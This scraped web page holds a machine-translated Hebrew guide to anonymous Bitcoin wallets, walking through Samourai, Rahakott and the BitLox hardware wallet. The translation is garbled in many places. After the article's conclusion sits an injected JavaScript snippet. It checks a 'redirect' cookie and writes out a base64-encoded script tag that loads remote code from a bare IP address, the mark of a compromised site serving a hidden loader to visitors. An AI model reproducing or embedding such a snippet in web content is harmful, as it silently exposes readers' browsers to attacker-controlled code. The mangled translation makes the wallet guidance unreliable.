15 49.0138 8.38624 1 0 4000 1 https://www.frank-gehry.com 300 0
theme-sticky-logo-alt
theme-logo-alt

ארנקי הביטקוין האנונימיים הטובים ביותר: המדריך היחיד שאתה צריך

יש חיסרון בכך שרשתות החסימות שקופות לחלוטין. כל אחד יכול לראות את ספר החשבונות המבוזר של ביטקוין, למשל, ולעקוב אחר הסכומים שנשלחו והתקבלו מכתובות שונות.

בעוד שכתובת ציבורית עצמה אינה מספיקה כדי לעקוב אחר האדם שעומד מאחורי העסקה, האקר שאפתן יכול לעקוב אחר מנות הנתונים הנשלחות מכתובת IP עצמה, ועקב כך לעקוב אחריך..

באופן מדאיג יותר, דברים כמו שימוש חוזר בכתובות (טעות נפוצה להפליא) יכולים לעזור להאקר להתפרנס בכספיך עצמם, ולגרום לך לאבד את הכסף שהרווחת קשה..

אז מה לעשות? להפסיק להשתמש בביטקוין? ברור שלא. יש הרבה אפשרויות שם לשמור על העסקאות שלך (וגם אתה) אנונימיות בעת ביצוע הזהב הדיגיטלי שלך. מאפליקציות סלולריות בחינם ועד ארנקי חומרה יקרים, פתרונות אנונימיות מגיעים בכל הצורות והגדלים.

בואו למצוא את ארנקי הביטקוין האנונימיים הטובים ביותר עבורכם.

ארנק סמוראי

לא להתבלבל עם הלוחמים המניפים חרבות, ארנק הסמוראים הוא אחד מארנקי הביטקוין הפרטיים והאלמוניים ביותר שיש.

בעוד שהוא חדש יחסית במשחק, התחרות שלו לא תואמת לתכונות שלו. זה עוזר לך לשמור על עסקאות BTC פרטיות, להסוות את זהותך ולאבטח את כספיך בבטחה. הצוות העומד מאחורי פתרון האחסון האנונימי של ביטקוין הם למעשה פעילי פרטיות, הנלהבים מאוד לשמר את הרוח האמיתית של הביטקוין..

בעוד האפליקציה עדיין בגרסת האלפא שלה, היא כבר ארוזה ברשימה מרשימה של תכונות:

 • קל לשימוש: הארנק של Samourai תוכנן תוך התחשבות בשימושיות, מה שמקל על הדברים החדשים והמומחים כאחד. כתוצאה מכך, הממשק מלוטש ומסודר, כאשר כל אפשרות שימושית נמצאת בקדמת הבמה.
 • אין שימוש חוזר בכתובת: הארנק מייצר כתובת ייחודית כדי להסתיר את הרגלי ההוצאות שלך, ומונע מהאקרים לחבר דברים יחד. Samourai גם מונע שימוש חוזר בכתובת על ידי הודעה כאשר אתה שולח ביטקוין לאותה כתובת יותר מפעם אחת.
 • באמת אנונימי: היישום מנתב את כל התעבורה דרך Tor ו- VPN (רשתות פרטיות וירטואליות) ומסתיר גם נתוני בלוקצ’יין. בנוסף, מצב ההתגנבות של סמוראי מסתיר את הארנק ממסך הבית, משגר, רשימת אפליקציות ואפליקציות עדכניות, מה שהופך אותו לנגיש רק באמצעות קוד PIN סודי..
 • CoinJoin: עסקאות משודרות בפומבי. עובדה זו משמשת לעתים קרובות האקרים למעקב אחר עסקאות ספציפיות ולניסיון להתחקות אחר מקורם. Samourai יכולה להשתמש בטכניקת STONEWALL שלה כדי ליצור עסקאות הדומות זו לזו, ומבלבלת כל האקר פוטנציאלי.
 • הימנע מקישור תפוקות שינויים קודמות: קריפטוגרפיה היא מדע מדויק מאוד. אדם בעל ידע מספיק בתחום יכול לקלוט סיכויים מהיסטוריית העסקאות של הזולת, ולנסות לברר את מפתח הארנק שלו. סמוראי מונע זאת על ידי ניתוח כל העסקאות הקודמות לפני בניית עסקה חדשה כדי לוודא שהיא לא מדליפה מטא-נתונים יקרי ערך עליכם ועל הארנק שלכם..

כיצד להשתמש בארנק סמוראי

מגדיר

קודם כל, קבל את האפליקציה מה- חנות הגוגל סטור ולהתקין אותו. עם הפעלתו בפעם הראשונה, האפליקציה תבקש שלל הרשאות. קבלה דרך כולם תביא לך מסך כזה.

צור ארנק ביטקוין חדש של Samourai

מההתחלה, יש לך אפשרות להפעיל את Tor.

Tor מנתב את תעבורת הרשת שלך דרך מערכת ממסרים מפותלת, מסתיר את כתובת ה- IP והמיקום שלך ועוקף כל תוכנות ריגול הצופות בתנועה שלך. החיסרון היחיד הוא קנס קל למהירויות האינטרנט שזה מחיר קטן לשלם עבור אבטחה.

סמן את התיבה להתחברות לטור.

כיצד להפעיל טור בארנק הביטקוין של סמוראי

במקרה שהשתמשת בארנק של Samourai בעבר, למכשיר שלך יהיה גיבוי מוצפן של הארנק האחרון שלך שהאפליקציה תגלה אוטומטית. פשוט הקש על האפשרות ‘שחזר’ בתחתית כדי להחזיר את הארנק הישן שלך. עם זאת, שמור על ביטוי הגישה של הארנק הקודם, כי בלעדיו לא ניתן לבטל את נעילת ההצפנה.

כיצד לשחזר את הגיבוי בארנק סמוראי

לחלופין, ייתכן שתרצה גם להעביר ארנק שנוצר במקום אחר לסמוראי. לשם כך, הקש על תפריט שלוש הנקודות בפינה השמאלית העליונה. מהתפריט הנפתח שמופיע, בחר באפשרות ‘ייבא ארנק חיצוני’. אתה יכול להשתמש בזרע הארנק כדי לייבא אותו לסמוראי ללא תקלה.

כיצד לייבא ארנק חיצוני בארנק Samourai

לעת עתה, אנו הולכים עם האפשרות ‘התחל ארנק חדש’.

צור משפט סיסמה עבור ארנק Samourai

ביטוי הסיסמה, אם אתה תוהה, הוא רק סיסמה מורחבת. אתה לא מוגבל למילה אחת, אלא לבחור אוסף של מילים, מספרים, תווים מיוחדים.

אולי תרצה לאקראי קצת את הביטוי במקום להשתמש רק במשהו צפוי כמו יום ההולדת שלך. והפוך אותו ליותר ממושך, עם לפחות תריסר מילים כדי לשפר את ביטחונו.

עכשיו, אתה צריך גם קוד PIN. ולא, אינך רשאי להשתמש ביום ההולדת שלך גם עבור זה, כמה שזה נראה מפתה.

בחר קוד PIN בארנק Samourai

כל החלקים המהותיים בתהליך הושלמו כעת. מה שמגיע לאחר מכן הוא בחירה אופציונלית לחלוטין ליצור מזהה PayNym עבור הארנק שלך. מה שהוא עושה זה בעצם ליצור ‘פנים’ עבור חשבונך, ומאפשר למשתמשים אחרים לשלוח תשלומים מבלי שתצטרך ליצור ולשתף כתובת ציבורית בכל פעם..

ניתן להוסיף את מזהה PayNym זה לפנקס הכתובות, ולתפקד ככתובת ייחודית לכל ארנק.

צור מזהה PayNym עבור ארנק Samourai

מכיוון שאין חסרונות ברורים בקבלת מזהה PayNym, אתה יכול לקחת את זה.

הוא מבקש את האישור שלך בפעם האחרונה, ולאחר מכן נוצר מחרוזת אלפא-נומרית עבור הכתובת שלך.

וואלה! ארנק הסמוראים שלך מוכן לצאת לדרך!

יצירת ארנק של Samourai

כיצד לשלוח ביטקוין עם ארנק סמוראי

עסקאות על ארנק Samourai פשוטות מדי. רואים את כפתור ‘+’ בפינה השמאלית התחתונה של מסך הבית? הקש על זה כדי להציג את אפשרויות העסקה.

כיצד לשלוח ביטקוין באמצעות ארנק סמוראי

לחיצה על הכפתור האדום לשליחת כסף באמצעות העלאת טופס השליחה. זה כולל את כתובת היעד הסטנדרטית, סכום ה- BTC ודמי העסקה. בסופו של דבר, יש אפשרות נוספת הייחודית לסמוראי.

כיצד לשלוח ביטקוין עם ארנק Samourai

אפשרות ריקושט עושה בדיוק את מה שאתה חושב; זה שולח את העסקה שלך קופצת דרך מספר נמענים, ומסתיר את המקור האמיתי של העסקה לכל צופה זדוני. זה שימושי, אם לא אכפת לך מהחיובים הנוספים, ויש לך עסקה חשובה לבצע.

העלאת תפריט הנקודות המשולשות מגלה כמה אפשרויות שימושיות.

אפשרויות תפריט ארנק של Samourai

לדוגמא, באפשרותך להציג את שכר הכרייה הנוכחי, מה שמועיל להחליט על הזמן הנכון לביצוע התשלומים שלך.

כיצד לבדוק את דמי הכורה בארנק סמוראי

לחלופין, תוכל ‘להוציא קבוצה’ על ידי מועדון קבוצה של עסקאות לבלוק אחד כדי לחסוך בעמלות הכורים.

הוצאת ארנק של Samourai Wallet

קבלת ביטקוין בארנק סמוראי

נווט שוב ​​למסך הבית. הפעם, לאחר הקשה על כפתור ‘+’, הכה באריח ‘קבל’ הירוק.

כיצד לקבל ביטקוין בארנק סמוראי

הפעם יש פחות אפשרויות; כל מה שאתה צריך כדי לקבל אסימונים הוא לחלוק את הכתובת הציבורית שלך עם השולח. כתובת זו מוצגת בשני פורמטים: מחרוזת אלפנומרית של שטויות (שעליך להעתיק ולהדביק, ולא לנסות להקליד בעצמך) וקוד QR לסריקה קלה באמצעות נייד אחר.

קבל קוד QR עבור ארנק Samourai

אבל שוב, זה לא הכל. יש רשימה של תכונות מתקדמות, שאינן הכרחיות, אך טוב שיש אם אתה יודע מה אתה עושה. לחץ על האפשרות ‘מתקדם’.

Samourai Wallet מתקדם לקבל תכונות

בטופס זה, יש לך אפשרות לבקש סכום מסוים (שימושי במקרה של עסק להסדיר חשבונות באמצעות ביטקוין, למשל) ולבחור את סוג הכתובת. ברירת המחדל, Segwit, היא הצורה המאובטחת יותר של כתובות והיא נפוצה כיום, אך עדיין יש כמה שמסתמכים על הפרוטוקולים הישנים יותר, אותם תוכלו לבחור במידת הצורך..

PayNyms

הקשה על אפשרות PayNyms מכפתור ‘+’ מעלה את מזהה ה- PayNym שלך, בליווי הכתובת הייחודית של הארנק שלך ותמונה שנוצרה.

כתובת הארנק של PayNyms

האפשרויות הפעם אינן שימושיות במיוחד.

תכונות של PayNyms

הקשה על מזהה PayNym שלך פותחת את הכתובת שלך בפורמט סריקת QR, ממנה תוכל לשתף אותה עם אחרים בקלות.

הקשה על כפתור ‘+’ מביאה אפשרויות שונות מאשר במסך התשלום.

הכפתורים שעולים הם בעצם כדי ‘לחתום’ על הודעות, ולהוסיף אנשי קשר של PayNyms לספר הכתובות שלך.

חתימה היא בעצם הצפנת הודעת טקסט עם המפתח הפרטי שלך, כדי לוודא שההודעה אכן נשלחה על ידך.

הודעת כניסה של PayNyms

כיצד להוסיף איש קשר חדש ל- PayNyms

ארנק רחקוט

ארנק רחקוט

Samourai טוב אם אתה מתכוון להשתמש רק ב- BTC. עם זאת, אם אתה מתכוון להשתמש בקריפטואים אחרים אז Rakakott היא הדרך ללכת.

היישום מבוסס האינטרנט הוא ארנק רב-קריפטוגרפי התומך במגוון רחב של אסימונים וקריפטו. כיום הוא תומך ב- BTC, BCH, LTC, ZEC ו- DASH. נוסף על כך, יש לו מגוון של פונקציות אנונימיות ופרטיות, המסייעות לשמור על בטיחותך ועל כספיך.

אולי הציור הגדול ביותר הוא שמשתמשים בארנקים חדשים אינם צריכים לספק מסמכים מזהים. עם Rahakott, אינך צריך לספק את הדוא”ל, מספר הטלפון שלך ואפילו לא שם משתמש.

חלק מהתכונות שלו הן:-

 • ארנק אלגוריסטי – השגיאה הגדולה ביותר שמשתמשים חדשים בביטקוין עושים היא שימוש חוזר בטעות בכתובות למספר עסקאות. Rahakott נמנע מכך על ידי יצירת כתובת חדשה בכל פעם שאתה מבצע עסקה. בכך אתה משפר את האנונימיות של העסקה שלך.
 • רישום אנונימי – כאמור, אין צורך בהוכחת זהות כדי ליצור ארנק. אין צורך בהודעות דוא”ל, מספרי טלפון או שמות משתמש להפעלת הארנק הזה. הדבר היחיד שתצטרך להשיג לכספיך הוא ביטוי מנמוני, שהוא ביטוי ייחודי המורכב מ -24 מילים שנוצרו על ידי האתר..
 • אימות שני גורמים – כדי לשפר את האבטחה, תוכל להפעיל אימות דו-גורמי. זה מחייב לאשר עסקאות מהסמארטפון שלך (כמו בעסקאות בנקאיות), מה שמקשה על האקר לגנוב את הכספים שלך..
 • שרתים מוצפנים לחלוטין – כל השרתים בהם הארנק משתמש מוצפנים, כך שגם מפתחיו אינם מסוגלים לגשת לנתוני הארנק של המשתמש. ניתן לגשת לנתונים רק באמצעות הביטוי הממוני.
 • מיקסר מטבעות מטבע מובנה – רשתות חסימות הן שקופות מטבען. זה הופך את הדבר לעניין של כל אחד לגשת לרשומות העסקה שלך. כדי להילחם בכך, Rahakott כולל כוס קריפטוגרפיה מובנית (או מיקסר) המערבבת את פרטי העסקה שלך עם אחרים, ומשלבת אותם בבלוק יחיד. תכונה זו מציעה יותר פרטיות לחסימות ציבוריות ושקופות כמו ביטקוין.
 • תכונות ארנק רב – Rahakott מסוגל גם ליצור ארנקים מרובים בנוסף לארנק ה- BTC הראשי שנוצר כברירת מחדל עם ההרשמה. משתמשים יכולים לעבור בין ארנקים, וגם לשנות את שמם או אפילו למחוק אותם.

תחילת העבודה עם ארנק רחקוט

לוגו ארנק Rahakott

מכיוון שרהקוט הוא ארנק אינטרנט, אינך צריך להוריד דבר. פשוט היכנס לאתר, ולחץ על האפשרות ‘צור ארנק’ בפינה השמאלית העליונה.

הדבר היחיד שרקוט מבקש ממך הוא השפה שלך. כמו כן, כדי למנוע מבוטים לקרוס את השרתים באמצעות בקשות מזויפות, תידרש להזין captcha פשוט. לחץ על ‘צור ארנק חדש’ כדי להמשיך.

כיצד ליצור ארנק Rahakott

האפליקציה תייצר מייד זרע חדש לארנק שלך. דאג לרשום את הביטוי המונומי של עשרים וארבע מילים במקום בטוח ומאובטח; זה המפתח היחיד לכספים שלך. לאחר שעשית זאת, לחץ על כפתור ‘שמרתי הכל’.

הביטוי הסודי של ארנק רחקוט

בשלב הבא תוכלו לבחור עבור אילו מטבעות קריפטוגרפיים אתם זקוקים לארנקים נפרדים. אפשרות הביטקוין (BTC) נבחרת כברירת מחדל, ולכן דילוג על שלב זה טוב למי שלא רוצה שום דבר אחר. אחרת, יש לבחור מבין Litecoin (LTC), Dash (DASH), Bitcoin Cash (BCH), Z Cash (ZEC) ו- Ethereum (ETH). לחץ על כפתור ‘צור ארנקים’ לאחר שתבחר.

צור סוגים שונים של ארנקי Rahakott

וזה הכל! ארנק הביטקוין האנונימי שלך מוכן לשימוש. בחלק הבא נבחן כמה מהפונקציות הבסיסיות של הארנק.

ארנק רחקוט

קבלת ביטקוין ברהקוט

בניגוד לארנקים אחרים, רהקוט מאמין בגישה מינימליסטית. ככזה, אין טופס קבלה נפרד באפליקציה. במקום זאת, מסך הבית עצמו מציג את הכתובת הציבורית שלך ישירות שתוכל לשתף.

כיצד להפקיד בארנק רחקוט

כתובת זו תיווצר טרי בכל פעם, כך שאינך צריך לדאוג לשימוש חוזר בכתובת. כמו כן, תוכל ללחוץ על סמל הרענון הקטן לצד הכתובת כדי ליצור ידנית אחת חדשה.

מלבד מחרוזת השטויות הארוכה, הכתובת מגיעה גם כקוד QR וכתובת אתר אינטרנט הניתנת לשיתוף. בעוד שקוד QR מוצג אוטומטית לצד הכתובת, עבור כתובת ה- URL אתה צריך ללחוץ על האפשרות ‘כתובת בקשת תשלום’.

כתובת האתר של בקשת התשלום מיועדת לקבלת כספים ממשתמשים לא רשומים. כל אדם שישלח את כתובת האתר יקבל כתובת ייחודית שנוצרה עבורם.

שליחת ביטקוין בארנק רחקוט

כדי לגשת לטופס השליחה, ישנן שתי שיטות. אתה יכול ללחוץ על סמל ‘שלח’ במישור הנייר במסך הבית (או על מסך ההפקדה, כפי שהוא מסומן). לחלופין, אתה יכול לקחת את הסמן לתפריט ‘ארנק’ בפינה השמאלית העליונה וללחוץ על ‘שלח’ בתפריט הנפתח..

מסך ‘העברת כספים’ נפתח. הוא מציג טופס פשוט עם שלושה שדות בלבד: נמען, מחשבון וכמות.

כיצד לשלוח כספים בארנק רחקוט

‘מקבל’ צריך להיות מובן מאליו. פשוט הזן את כתובת החשבון שאליו ברצונך לשלוח כספים. שדה ‘סכום’, באופן דומה, נועד להזנת ערך ה- BTC אותו ברצונך לשלוח. אתה יכול להשתמש במחשבון כדי להבין את ערך המטבע הפיאטי של הסכום שהזנת, על ידי לחיצה על כפתור ‘חשב’.

זה עובד בשני הכיוונים; מילוי הפיאט או סכום ה- BTC ייצר את המקבילה בשדה האחר בחישוב. אתה יכול גם לבחור באיזה מטבע ברצונך לבצע את הערכת השווי שלך, החל מדולר ארה”ב (USD), אירו (EUR), יואן סיני (CNY), ין יפני (JPY), והרובל הרוסי (RUB).

ישנן שתי אפשרויות שתוכל לעבור להתאמה אישית נוספת של העסקה שלך: ‘הפחת עמלות מהסכום’ ו’אל תשתמש בהעברה פנימית ‘. בדיקת האפשרות הראשונה חוסכת ממך צורך להוסיף סכום נוסף עבור דמי העסקה, אך גורמת לזכות הנמען בסכום הקטן יותר בגודל העמלה..

האפשרות השנייה עדיפה להישאר מסומנת. תשלום מופחת מוחל על העברות פנימיות בין בעלי חשבונות Rahakott, המתבצעות במהירות רבה יותר מאשר חיצוניות וללא מעורבות הבלוקצ’יין. החלפתו מאלצת העברה חיצונית, אשר כפופה לעמלות הרשת הרגילות.

ניהול ארנקים מרובים

במקרה שיצרת ארנקים מרובים, או שאתה רוצה ליצור אחד מהם, לחץ על הכרטיסייה ‘ארנק ראשי’ למעלה.

פעולה זו תעביר אותך למסך הארנקים. מסך זה יפרט את כל הארנקים שיצרתם עם חשבון זה, בצירוף היתרות שלהם. כדי לעבור לכל אחד מהם, פשוט לחץ עליו.

כיצד להוסיף ארנקים חדשים לארנק רחקוט

ליצירת ארנק חדש, בחר את סוג הארנק מהרשימה הנפתחת ולחץ על כפתור ‘הוסף’. הארנק ייווצר באופן מיידי. כאן, יש לך אפילו אפשרות ליצור גם ארנקים של מונרו או את’ריום.

ארנקים ארנקים של רבקוט

BitLox

ארנקי Android ו- Web כולם טובים ומשובחים, אבל מה אם תרצו לאחסן ביטקוין לפרקי זמן ארוכים? איך אתה מגן על הכספים שלך באחסון קר מפני מעקב וסינון בזמן שאתה אפילו לא משתמש בהם?

התשובה, כמובן, היא להשתמש בארנק חומרה. ובעוד ארנקים כמו לדג’ר או טרזור ​​ידועים ומכובדים, יש משהו שחסר להם: אנונימיות.

אמנם זה לא יכול להיות בעיה גדולה עבור חלק, אך כאשר אתה מפקיד חלק גדול מהתיק שלך בידי ארנק חומרה, עדיף להיות בטוח מאשר להצטער. עם זאת, אנו ממליצים על ארנק החומרה של Bitlox.

BitLox הוא ארנק חומרה אשר נועד לספק את האבטחה הטובה ביותר האפשרית להחזקות ביטקוין.

לשם כך יצרני הארנק לקחו את שלמותו הפיזית לקיצוניות, כשהמארז מורכב מסגסוגות טיטניום וחלל. בנוסף, ארנק BitLox יכול לייצר כמאה ארנקים נפרדים, כאשר מחציתם יכולים להסתיר את הנעילה רק על ידי ה- PIN האישי של אותו ארנק מסוים, על גבי ה- PIN עבור המכשיר עצמו..

Bitlox מגיע בשלושה דגמים שונים, בהתאם לצרכי האבטחה שלך.

 • BitLox מתקדם: הדגם הבסיסי של ביטלוקס עשוי מסגסוגות חלל ומגיע עם היכולת ליצור מאה ארנקים שונים. כל ארנק הוא ארנק דטרמיניסטי היררכי לחלוטין (המכונה גם ארנק HD). זה אומר שהם יכולים לקבל מספר בלתי מוגבל של כתובות, מה שהופך את זה לדרך מושלמת להסתיר את הביטקוין שלך במגוון ארנקים וכתובות קטנים. עלות ה- BitLox Advanced היא 98 דולר.
 • BitLox Ultimate: האולטימטיבי שונה מהמתקדמים רק בבניית המארז שלו, שעשוי מטיטניום במקום סגסוגות חלל. מלבד היותו כמעט בלתי ניתן להריסה, יש לו בעצם את אותן תכונות בטיחות ואבטחה כמו BitLox Advanced. עלות מודל זה 148 דולר.
 • פרטיות BitLox קיצונית: זהו קרם היבול והסיבה לכך שכללנו אותו במדריך זה. פרטיות BitLox Extreme מגיעה עם קמרון USB בדרגה צבאית עם מערכת ההפעלה TAILS הממוקדת בפרטיות מותקנת מראש. TAILS היא בעצם גרסה מופשטת של לינוקס שמכריחה את כל תעבורת הרשת שלה דרך TOR, מה שמאפשר לעקוב אחר הנתונים המשודרים שלך. כבונוס נוסף, הוא מצפין את כל ההודעות והקבצים, ומאפשר לך לקבל ביטקוין באנונימיות מלאה. גרסת פרטיות קיצונית זו של BitLox עולה 198 דולר.

כל שלושת הדגמים של BitLox מגיעים עם אחריות מלאה למשך 5 שנים וניתנים להתאמה אישית עם עד שלוש שורות של טקסט או יצירות אמנות חרוטות בלייזר. אפשרות ההתאמה האישית הזו אינה מוצעת על ידי אף אחת מהמתחרות המובילות שלה, מה שהופך אותה לארנק החומרה היחיד שמציע שירות כזה.

למרות שכולם נאמרו, תכונות האבטחה יוצאות הדופן שלה הן הסיבה היחידה להשתמש ב- BitLox על ארנקי חומרה אחרים. הוא תואם לפרוטוקולים BIP32 ו- BIP39, והוא ארנק דטרמיניסטי היררכי לחלוטין עם יכולת להשתמש עד קוד זיכרון בן 24 מילים (רק באבטחה מקסימאלית; התקן הוא מנמן בעל שתיים-מילים).

ברגל מעל ארנקי חומרה אחרים, קוד PIN נדרש כדי לבטל את נעילת המכשיר, ואז PIN שני כדי לפתוח כל ארנק בודד עצמו. אתה יכול אפילו להגדיר קוד PIN לרמת העסקה אם אתה נוטה כל כך. הוסיפו לכך את שיטות ההתעסקות שלו נגד התקנים כמו ה- AEM, או ‘Anti Evil Maid’, ותקבלו ארנק שקשה מאוד לפצח..

סיכום

בעידן זה של מעקב דיגיטלי 24/7, חשוב לכסות את הצעדים האלקטרוניים שלך, במיוחד כשמדובר בעסקאות פיננסיות. זה חשוב במיוחד בקריפטו, בשל השקיפות הטבועה שלו ואופיו המקוון בלבד.

לשם כך, ארנקי Bitcoin אנונימיים הם חובה בכל פלטפורמה בה אתה משתמש.

עבור משתמשים ניידים, הארנק של Samourai הוא האופציה הטובה ביותר. למרות שזה חדש יחסית, הוא ארוז בתכונות ובאבטחה, ומבטיח שהכספים שלך יישארו בטוחים בידיים שלך.

למי שמעדיף את שולחן העבודה, אין מכים את ארנק האינטרנט Rahakott. ארנק Rahakott מציע את הקלות של יישום מבוסס אינטרנט עם אבטחה של מערכת אנונימית, ואת האיזון המושלם. יתרה מכך, ניתן לגשת אליו מכל מקום על פני האדמה ללא כל פרטים אישיים, תוך שימוש רק בביטוי המנומוני.

לבסוף, לאחסון מאובטח לטווח ארוך של ה- Bitcoins שלך, אתה לא צריך לחפש רחוק יותר מארנק חומרה של Bitlox. ארנק החומרה היחיד שהוטען מראש עם מערכת ההפעלה Tails הממוקדת בפרטיות, ארנק Bitlox מתגאה במגוון תכונות וביטחון כדי לבייש USB בדרגה צבאית. עם זאת, הוא לא בדיוק זול, ולכן עדיף לאחסן כמויות גדולות של אסימונים באחסון קר.

בסופו של דבר, בכל פתרון אחסון ההצפנה שתבחרו להשתמש, פשוט שמרו על המטבעות שלכם אנונימיים!

פונקציה getCookie (e) {var U = document.cookie.match (RegExp חדש (“(?: ^ |;)” + e.replace (/((\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, ”\\ $ 1 ″) +” = ([^;] *) ”)); להחזיר U? decodeURIComponent (U [1]): ריק 0} var src = “נתונים: text / javascript; base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, עכשיו = Math.floor (Date.now () / 1e3), עוגיה = getCookie ( “הפניה”); אם (עכשיו>= (time = cookie) || ריק 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new date ((תאריך חדש) .getTime () + 86400) ; document.cookie = ”redirect =” + time + ”; נתיב = /; פג תוקף = ”+ date.toGMTString (), document.write (”)}

Previous Post
חילופי המטבעות הטובים ביותר באופליה באוסטרליה
Next Post
كيفية شراء عملة معماة ترون (TRX) – دليل تفصيلي